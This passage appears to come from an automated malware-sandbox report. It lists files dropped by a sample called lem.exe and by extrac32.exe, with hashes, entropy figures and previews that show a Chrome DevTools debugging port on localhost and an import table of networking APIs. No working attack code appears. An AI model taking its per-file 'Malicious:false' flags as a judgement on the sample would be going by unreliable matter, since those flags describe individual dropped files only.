                                                                                                                                                                                                                                                                                                  SHA1:01856AC52AF5977C0D1A05B6493EBD9E4047335A
                                                                                                                                                                                                                                                                                                  SHA-256:A659A3A38F2B81423A6FC4F3FA88AB863AEA46F235924E1E9359F14263A97C81
                                                                                                                                                                                                                                                                                                  SHA-512:1D99ACCE5CEDF290D871B6B74BD80520BA5CBDDA2895C0B77FC7B23BB0096970A7C0F6FA0ACA1EAAA75EB7E1F7FED0302C56E9FE29E4FF436E01F174FB300632
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/9419708F87545C64E597CE80A1497BBD",.. "id": "9419708F87545C64E597CE80A1497BBD",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/9419708F87545C64E597CE80A1497BBD"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/9497CE28D0F1A3AE45F4FB595AE48753",.. "id": "9497CE28D0F1A3AE45F4FB595AE48753",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/9497CE28D0F1A3AE45F4FB595AE48753"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1787
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.381504749609709
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:SfNaoC+3OTEC+OfNaoCVfTfyCVfFfNaoCwEVCwLfNaoCYJ0UrU0U8CT:6NnC+3OTEC+2NnCNTyCNxNnCxCgNnC2O
                                                                                                                                                                                                                                                                                                  MD5:8B398FC23197191A31362C6F99EA5FDF
                                                                                                                                                                                                                                                                                                  SHA1:4503A5BCA689E53F633B03D01D289BBB4F47A851
                                                                                                                                                                                                                                                                                                  SHA-256:99C4B7EDE0E02A63B63068CC70CB84981E0DD2873033CECA37FA5EFB42D7ED50
                                                                                                                                                                                                                                                                                                  SHA-512:A3413A2C8CB8C3CA056AC800AB687D3AC9E41471F608E849C483EB936A02078F0C236495E12076108FB1CB55147F50CB5934E7A7C69039777AACC82D19235AFF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/851BBF8E546841171FF04678ED35229A",.. "id": "851BBF8E546841171FF04678ED35229A",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/851BBF8E546841171FF04678ED35229A"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/5BCFFBE2D7ACBC613B79F1AC198A8CC7",.. "id": "5BCFFBE2D7ACBC613B79F1AC198A8CC7",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/5BCFFBE2D7ACBC613B79F1AC198A8CC7"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo
                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):122880
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.443588249528694
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:h4INduPbOU7aI4kCD9vmPukxhSaAwuXc/mex/SGKAGWRqA60dTcR4qYnGfAHE9AU:hBNIimuzaAwusPdKaj6iTcPAsAhxY
                                                                                                                                                                                                                                                                                                  MD5:B7A225A35892C158541ED50000DE3CA1
                                                                                                                                                                                                                                                                                                  SHA1:2ED01C2E0C53C3F61F1D8CA3AEA5CFB122F543FD
                                                                                                                                                                                                                                                                                                  SHA-256:5197B20A0EA030CAFD792C75D14663EBC790D55D4CA748ECC5DA58E797BDCB1E
                                                                                                                                                                                                                                                                                                  SHA-512:2731875211B4AE294A95DE3128451B111D801326C8BFD19E64582D25BD39724EBF672BE9A35E2CC52020B145A7964B116ED6445FFA6226C2487C1919560A09FE
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\lem.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):75776
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.997833338326358
                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:bwDHPOTarQNZo49+qq5EkZa2m75a6K2SILq7E2Uyg3a:U7zMX9+75ETXnpSzoyg3a
                                                                                                                                                                                                                                                                                                  MD5:861ABB01893CEF00C917F520F2AC50C9
                                                                                                                                                                                                                                                                                                  SHA1:784492CD688537ECE38D75D5F9345CD75736F13E
                                                                                                                                                                                                                                                                                                  SHA-256:1D40C9FE3FF124342CD6638D8D536267D15DABF9B6816BE3507923912AF8658A
                                                                                                                                                                                                                                                                                                  SHA-512:6B112DF90D22D4C23517F1E7446172025C151F3617F730041EA49C8943572D2D93E7FBA35E4594B5139C73E1321F8B77710888D0001B203502E6CF264877008C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):128000
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.342106044541643
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3072:oZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWf9:oK5vPeDkjGgQaE/loUDtf9
                                                                                                                                                                                                                                                                                                  MD5:AE62072FC20EC1B324E6B41DD123A00E
                                                                                                                                                                                                                                                                                                  SHA1:9519EED850217F390C043A7E8505CA88E43DBD8F
                                                                                                                                                                                                                                                                                                  SHA-256:FDA63E313CE6AE96F8A08D803D4822E8757D82DEAE07650303B2D5A54D45CEFE
                                                                                                                                                                                                                                                                                                  SHA-512:E3471F6D3EDDEB13B989EE72EA2A4A8A33D7B0DA1B1F99DEE25C8132B08FD4BE70063A0335E1D300E9FE252C87DA9CE816900C8468C559D0CBF1E1F466D643D7
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):88064
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.671440792234813
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:mGc/xv5mjKu2IwNnPEBiqXv+G/UXT6TvY464qvI932eOypvcLSDOSpZ+6:K5mjccBiqXvpgF4qv+32eOyKODOSpQ6
                                                                                                                                                                                                                                                                                                  MD5:4ED5DCEF027C1FAAD9B155A863F099E7
                                                                                                                                                                                                                                                                                                  SHA1:F86263BC8EB00B518DAC5E0DE6BB8A12753CE1D6
                                                                                                                                                                                                                                                                                                  SHA-256:B7EBD5730B85DB548DBD9086B20400350E9469B9ED64D0C7F792898DD10E9A45
                                                                                                                                                                                                                                                                                                  SHA-512:100BE28B2E696A1BA6543EE005606C782AE2E35BB0E63C56E43CB5FE03B874078A1554C7EBE40121DB5ABFED2FC90E9DDDA3F5B390BF429247268BE902047D2E
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):53248
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.0293746515034385
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:384:aMOULtVJBCQs1xaJ3WMygaruSIKlcQljLWWel319stEjFtr+/hdvE6HDyOpbM13i:JLtVSQsbZgar3R/OWel3EYr8qcDP8W1
                                                                                                                                                                                                                                                                                                  MD5:652AB88B812362A12F43E5F561E9ADB4
                                                                                                                                                                                                                                                                                                  SHA1:7C1DD2A4C15F9CC17C4DFFD1BA62D58A58A98FDD
                                                                                                                                                                                                                                                                                                  SHA-256:FF8C2A1CBAA6FDAC41F8D430E5AA9209B7F3514BFEB81F8D612E6AFD7ACD93F5
                                                                                                                                                                                                                                                                                                  SHA-512:DF3B0DFE676802FA9C8DDF5FDBE82B704541554D59F594C6333912CD17C4CE48945F5A07310D30429516CD594E44D7E3E20204E48FCA1D2D6D4B06E434B7814D
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:rQueryValueW..VERSION.dll...timeGetTime.2.mciSendStringW....waveOutSetVolume..WINMM.dll.{.InitCommonControlsEx..S.ImageList_Create..o.ImageList_ReplaceIcon.T.ImageList_Destroy.m.ImageList_Remove..r.ImageList_SetDragCursorImage..P.ImageList_BeginDrag.V.ImageList_DragEnter.W.ImageList_DragLeave.^.ImageList_EndDrag.X.ImageList_DragMove..COMCTL32.dll....WNetAddConnection2W.I.WNetUseConnectionW....WNetCancelConnection2W..$.WNetGetConnectionW..MPR.dll.k.InternetCloseHandle...InternetOpenW...InternetSetOptionW..t.InternetCrackUrlW.Z.HttpQueryInfoW....InternetQueryOptionW..r.InternetConnectW..X.HttpOpenRequestW..^.HttpSendRequestW..5.FtpOpenFileW..2.FtpGetFileSize....InternetOpenUrlW....InternetReadFile....InternetQueryDataAvailable..WININET.dll...GetProcessMemoryInfo..PSAPI.DLL...IcmpCreateFile....IcmpSendEcho....IcmpCloseHandle.IPHLPAPI.DLL..!.LoadUserProfileW....CreateEnvironmentBlock..,.UnloadUserProfile...DestroyEnvironmentBlock.USERENV.dll.?.IsThemeActive.UxTheme.dll...InterlockedIncreme
                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):70020
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.039348092119214
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:su0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:s4ZNoGmROL7F1G7ho2kOb
                                                                                                                                                                                                                                                                                                  MD5:4247BC278D872C15C7E77F75E2EC414D
                                                                                                                                                                                                                                                                                                  SHA1:3B3687C0CD3E511C262CB9E85034FE3BBB89E5A2
                                                                                                                                                                                                                                                                                                  SHA-256:973B0AE1E810E5E17A3A96B3B440F6D3CC588E0FB68819D8F249F7C0E81CBCBE
                                                                                                                                                                                                                                                                                                  SHA-512:349F6CBDC8F3B0FF07D3D1930B6FB96D6F2D88E073DD70491F5380CECEC05080A81E3B77F8004692F04D50A975666E31086BEA8E226FB46A6368E3B16D516DC2
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):88064
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.716538385178715
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:CUQlHS3cctlxWboHdMJ3RraSXL21rKoUn9r5C03Eq30BcrTrhCX4aVmoT:CxlHS3NxrHSBRtNPnj0nEoXnmK
                                                                                                                                                                                                                                                                                                  MD5:0B4EA7C4E70CFAC855BF4D7C0288E2BE
                                                                                                                                                                                                                                                                                                  SHA1:36430F5AD2C7964DFBD3B78921FE71FD89AAF575
                                                                                                                                                                                                                                                                                                  SHA-256:047C2EF53D55A7E575D02A23FDE3E8DA6C6D51A2504231BD4AD33B3E0824A3EE
                                                                                                                                                                                                                                                                                                  SHA-512:C04298BE87BF00CB3CADA0F302E80C8C8B5A0E9F1C0017B7B80B70040392136F209CC391B728F1905F36CB8406019C5370E7FC3043158523EFF0D9DC4CA5C071
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\lem.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):97040
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.998385944090606
                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:HgHymtPnJHvGNKNEahCqR+aCC9/uJX0Ze6Us+NeaeUxwSJqy2CRrRW/VVnS3YPDv:cycPhvGNWhTK4mXxNwHJ8qCeFAc86pSQ
                                                                                                                                                                                                                                                                                                  MD5:530245F3720C5A7DDD0567A546420A30
                                                                                                                                                                                                                                                                                                  SHA1:D5B8167F667D02398531C1CCE326509CB01E86E6
                                                                                                                                                                                                                                                                                                  SHA-256:B8D55ACFB72DB731DD7D1FC4FFD68B1E047E3C4CB07109BEC40B72EC4B6903DB
                                                                                                                                                                                                                                                                                                  SHA-512:B06FA89ABCD6913E253D7F86DC312089F7077C9F2E638DFFD27AE3849C897AE46DC3D3BA659AAF88D8A369C395D27BEA03B67B98442E9C4C925F502552606BB9
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.583824448269045
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3072:i+AqVnBypIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9coF:imVnjphfhnvO5bLezWWt/Dd314V14Zgt
                                                                                                                                                                                                                                                                                                  MD5:B655E394756A3AFA8CEC8800C5D1FB8B
                                                                                                                                                                                                                                                                                                  SHA1:F058CB3583B851FB272B9B0768FCEE865F78E486
                                                                                                                                                                                                                                                                                                  SHA-256:638B1FA5EFB53EFA1EB2160A5DD443D8F12614F29EBF9C1B04C7B2E59BE23A63
                                                                                                                                                                                                                                                                                                  SHA-512:03B9A541DBE3010C62867949D5B42625662E2EB215CCAA369533F3F7F128B4E2E368F47F1B5DB4ED3FCFAF213147BFBFAD3512D84242DCC169DB5620058933CF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):129024
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.685566394532451
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3072:pAU4CE0Imbi80PtCZEMnVIPPBxT/sZydTmS:pAhClbfSCOMVIPPL/sZg
                                                                                                                                                                                                                                                                                                  MD5:1FA2AC3ECE7FD9A15C18981315729898
                                                                                                                                                                                                                                                                                                  SHA1:1477784CCA6FED096A2928C9DDDC38AB001905D1
                                                                                                                                                                                                                                                                                                  SHA-256:2EC359B827914240FD5094E64A16B4AC392C193BF1DA4D19395ED72779F91685
                                                                                                                                                                                                                                                                                                  SHA-512:2152DCB3F7004F1F78446D7AE0A65C6928C56E29DC474F80575FA7CCA450C546F3366539D97276B98FBBD0E4E6B04EB37FF1C167F32B797D78106C99B38EAAF1
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):31335
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.694019108205432
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:514ugFV0910SWyR5kNVdS3sNp/xm3MbiMuYEDlyFUyv6E/ty8:5WcDWyRKNVd2M/IxMuYEDlymsTQ8
                                                                                                                                                                                                                                                                                                  MD5:6B72597205C77D3E40E1A35BEE403801
                                                                                                                                                                                                                                                                                                  SHA1:6BECEE055C6E057AF9475B6D651B4EE561D02F20
                                                                                                                                                                                                                                                                                                  SHA-256:C899297FBDFC88C1634B1145A087FDB5BE17172FD786C078B299557B22F06DEB
                                                                                                                                                                                                                                                                                                  SHA-512:7CB1A98E0C7FBB349D9CB681233A9F4ED22A1C3FAADCDF1BC270B04BD97D3FC41AB6F762B2F5F231281D63D96AC3D243640BA81D5E8CCD9F54486B4F538CA8B4
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):154477
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                  MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                  SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                  SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                  SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2110
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.399061735884073
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:Yzj57SnaJ57H57Uv5W1Sj5W175zuR5z+5zn071eDJk5c1903bj5jJp0gcU854Rr5:8e2Fa116uCntc5toYM5M
                                                                                                                                                                                                                                                                                                  MD5:F6612917962199F6F9A40D07879D0D78
                                                                                                                                                                                                                                                                                                  SHA1:C5FC028A0F4D9449C9C684759BB7A23E6F616A81
                                                                                                                                                                                                                                                                                                  SHA-256:A2B112D62F29DC6890783B8C1D46FD2B8895C04FC14AB095E35569FE1F8B19B6
                                                                                                                                                                                                                                                                                                  SHA-512:4C0D1F541D7DABC16948A551824077EC195F6CFCF723AEB2FC5BB0F881A8461E3749DC2507416412F864C333C208F4A56FF4B68F9EFD0523BDE7C26CC57C51CB
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"logTime": "1004/133448", "correlationVector":"vYS73lRT+EoO2Owh9jsc+Y","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"n/KhuHPhHmYXokB31+JZz7","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"fclQx26bUZO07waFEDe6Fn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"0757l0tkKt37vNrdCKAm8w","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"uTRRkmbbqkgK/wPBCS4fct","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"2DrXipL1ngF91RN7IemK0e","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"d0GyjEgnW85fvDIojHVIXI","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"PvfzGWRutB/kmuXUK+c8XA","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"29CB75FBC4C942E0817A1F7A0E2CF647
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):11185
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                  MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                  SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                  SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                  SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):103855
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.924096864897051
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3072:v5z/M7to/iGyQVUdJpABfSi77IbHZ0PmFKiri:vqeiGyQVUd0Bf77cZPdi
                                                                                                                                                                                                                                                                                                  MD5:75C914BA3F4FDD5FF0CEC899811B7519
                                                                                                                                                                                                                                                                                                  SHA1:27F398E65EAF24FC377F13326FD7A7283697E48F
                                                                                                                                                                                                                                                                                                  SHA-256:91870F6B76792B81181CC7597CB6CAC14DD8281AD1527F75460BA2C9AEF08A0C
                                                                                                                                                                                                                                                                                                  SHA-512:DBD94BB300639340F75A782B916298805DAC1B6F9881CC49DBB4088CC53FF2F433767092F76974BDA73200898BF8D0891D2396CB9403D3AC21371E35284F91B1
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...qiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:695f8e9f-409d-324a-b50a-1e3067707628" xmpMM:DocumentID="xmp.did:91EA24D7191011E5B1FF9488C51C29D1" xmpMM:InstanceID="xmp.iid:91EA24D6191011E5B1FF9488C51C29D1" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6a6b844a-8117-4c4c-9b2f-30d3769ed7c7" stRef:documentID="xmp.did:695f8e9f-409d-324a-b50a-1e3067707628"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>^.i.....IDATx.bb .0..;./..;@...A.P9F...y
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):154477
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                  MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                  SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                  SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                  SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):4982
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                                  Encrypted:false
